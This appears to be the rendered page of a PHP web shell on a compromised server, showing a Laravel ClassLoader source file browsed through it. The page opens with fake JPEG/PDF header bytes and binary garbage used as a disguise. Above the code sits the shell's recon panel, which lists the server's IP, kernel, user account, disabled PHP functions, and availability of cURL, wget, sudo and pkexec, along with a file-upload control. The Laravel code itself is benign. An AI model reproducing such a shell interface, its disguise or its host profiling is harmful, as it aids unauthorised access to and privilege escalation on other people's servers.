ÿØÿà JFIF ÿþ; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 157.90.209.209 / Your IP : 216.73.216.148 [ Web Server : Apache System : Linux hcomm124.dns-wk.info 4.18.0-553.64.1.el8_10.x86_64 #1 SMP Mon Jul 28 12:01:56 EDT 2025 x86_64 User : evidenciarevista ( 1049) PHP Version : 7.2.34 Disable Function : exec,passthru,shell_exec,system Domains : 216 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /home/evidenciarevista/admin/vendor/laravel/framework/src/Illuminate/Support/ |
Upload File : |
<?php namespace Illuminate\Support; class ClassLoader { /** * The registered directories. * * @var array */ protected static $directories = []; /** * Indicates if a ClassLoader has been registered. * * @var bool */ protected static $registered = false; /** * Load the given class file. * * @param string $class * @return bool */ public static function load($class) { $class = static::normalizeClass($class); foreach (static::$directories as $directory) { if (file_exists($path = $directory.DIRECTORY_SEPARATOR.$class)) { require_once $path; return true; } } return false; } /** * Get the normal file name for a class. * * @param string $class * @return string */ public static function normalizeClass($class) { if ($class[0] == '\\') { $class = substr($class, 1); } return str_replace(['\\', '_'], DIRECTORY_SEPARATOR, $class).'.php'; } /** * Register the given class loader on the auto-loader stack. * * @return void */ public static function register() { if (! static::$registered) { static::$registered = spl_autoload_register([static::class, 'load']); } } /** * Add directories to the class loader. * * @param string|array $directories * @return void */ public static function addDirectories($directories) { static::$directories = array_unique(array_merge(static::$directories, (array) $directories)); } /** * Remove directories from the class loader. * * @param string|array $directories * @return void */ public static function removeDirectories($directories = null) { if (is_null($directories)) { static::$directories = []; } else { static::$directories = array_diff(static::$directories, (array) $directories); } } /** * Gets all the directories registered with the loader. * * @return array */ public static function getDirectories() { return static::$directories; } }